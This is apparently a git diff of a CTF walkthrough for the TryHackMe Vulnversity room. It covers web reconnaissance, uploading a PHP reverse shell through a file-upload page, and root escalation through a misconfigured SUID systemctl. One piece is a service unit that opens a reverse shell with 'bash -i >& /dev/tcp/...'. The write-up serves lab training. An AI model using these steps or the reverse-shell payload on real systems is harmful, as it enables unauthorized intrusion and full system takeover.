--- a/1. Vulnversity Room.md
+++ b/1. Vulnversity Room.md
@@ -10,9 +10,9 @@ Initially I started usinmg the provide 'AttackBox' from TryHackMe, but part way 
 
 Here is how it went:
 
-Step 1: Reconnaissance
+#Step 1: Reconnaissance
 
-Basic reconnaissance was performed using NMAP. 
+##Basic reconnaissance was performed using NMAP. 
 
 The open ports discovered with NMAP:
 
@@ -25,7 +25,7 @@ Then I looked at the versions of the services with these open ports using the -s
 We can see Apache running on port 3333, this will be our attack vector. 
 
 From here we use GoBuster to look for interesting directories on the web server. I  used a brute force method with different word lists.
-After trying with a few word I found some interseting folders.
+After trying with a few word I found some interesting folders.
 
 ![image](https://user-images.githubusercontent.com/60744763/120154589-634c5680-c233-11eb-8896-7a0501b2bcee.png)
 
@@ -33,44 +33,46 @@ From here we discovered the 'internal' folder, browsing to this showed us an upl
 
 ![image](https://user-images.githubusercontent.com/60744763/120154708-7a8b4400-c233-11eb-8603-b287a43fd81b.png)
 
-Note at this point I changed over to my Kali linux box and reset the target machine, as such the IP address changed.
+*Note at this point I changed over to my Kali linux box and reset the target machine, as such the IP address changed.*
 
-Step 2: Attempt to deliver a pay load and comprimise the server
+#Step 2: Attempt to deliver a pay load and compromise the server
 
-I use Burp to try and findout what types of file extensions I can download. 
-Using the sniper attack allows me to try various file extensions very quickly. 
+I use Burp to try and findout what types of file extensions I can be uploaded, hoping for a PHP based file. 
+Using Burp's sniper attack allows me to try various file extensions very quickly. 
  
 ![image](https://user-images.githubusercontent.com/60744763/120155034-cf2ebf00-c233-11eb-88b3-a73405d0430d.png)
 
 This identified that .phtml files can be uploaded, see above.
 
-No we deliver the payload:
+##No we deliver the payload:
 
-I uploaded a php-reverse-shell as a .phtml file using the upload page. 
-I adjusted the reverse shell script variables so it points to my Kali linux’s vpn IP and port. 
+I uploaded a php reverse shell as a .phtml file using the target's upload page. 
+I edited the reverse shell script variables so it points to my Kali linux’s IP and port. 
 The reverse shell was from here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php 
 
-Then I setup a netcat listener with this command: nc -lvnp 1234
-This will listen for a connection on port 1234. Note the php reverse shell must be set with this port and my IP address so it can make a connection.
+Then I setup another netcat listener with this command: `nc -lvnp 1234`
+This will listen for a connection on port 1234. 
+*Note the php reverse shell must be set with this port and my IP address so it can make a connection.*
 
-Then I went to the url http://10.10.151.175:3333/internal/uploads/php-reverse-shell.phtml to run the script and received a connection on my netcat listener as follows:
+Then I went to the url http://10.10.151.175:3333/internal/uploads/php-reverse-shell.phtml to run the script I just uploaded. 
 
-Then we can see the reverse shell has made a connection back to my kali box.
+Seconds later I received a connection on my netcat listener!
+We can see below the reverse shell has made a connection back to my kali box.
 
 ![image](https://user-images.githubusercontent.com/60744763/120155466-33ea1980-c234-11eb-81fe-00558f14202d.png)
 
-And I have shell access! 
+And now I have shell access! 
 
-Searching aroundo on this server, I found the first flag in the user's home folder.
+Searching around on this server, I found the first flag in the user's home folder.
 
 ![image](https://user-images.githubusercontent.com/60744763/120155639-6267f480-c234-11eb-9e0a-4a654587ef5a.png)
 
-Step 3: Privilege Escalation
+#Step 3: Privilege Escalation
 
 Now we want to attemp to get root access. I will look for files with the SUID bit set, maybe one of them can be exploited.
 
-I used the command “find . -perm /4000” to files with the SUID permissions set. 
-This showed that "systemctl" had the sticky-bit set, which is not normal. As a normal user can stop, start and even create services.
+I used the command `find . -perm /4000` to files with the SUID permissions set. 
+This showed that `systemctl` had the sticky-bit set, which is not normal. As a normal user can stop, start and even create services.
 
 At this point my plan is to create a service that launches a shell which I can access with the systemctl command. 
 Now researching how to do this...
@@ -80,7 +82,7 @@ https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-syst
 
 
 I created a file called root.service file as below, which will be my service file:
-[Unit]
+`[Unit]
 Description=root
 
 [Service]
@@ -90,19 +92,19 @@ ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.4.37.95/9999 0>&1'
 
 [Install]
 WantedBy=multi-user.target
-
+`
 I named the file with a phtml extension and uploaded it through the site (this was quicker than using the nc terminal to create the service file).
 
 Then I renamed the uploaded file from my active shell on the webserver to root.service. 
-Then ran the following command to create the appropriate symlinks and allow the system to run the service: 
-systemctl enable /var/www/html/internal/uploads/root.service
+Then I ran the following command to create the appropriate symlinks and allow the system to run the service: 
+`systemctl enable /var/www/html/internal/uploads/root.service`
 
 ![image](https://user-images.githubusercontent.com/60744763/120155982-cc809980-c234-11eb-94ba-2cb1ab4b9bb9.png)
 
 Now we have created a new service which should launch a reverse shell back to my kali box.
 
-Then I opened another netcat listener on port 9999 (as per the root.service) on my Kali box. 
-After this I started the service on the webserver with the command ‘systemctl start root.service’ 
+At this point I opened another netcat listener on port 9999 (as per the root.service) on my Kali box. 
+After this I started the service on the webserver shell with the command `systemctl start root.service`
 
 Presto! The service connected back to my Kali machine with the reverse shell as root. See below...
 
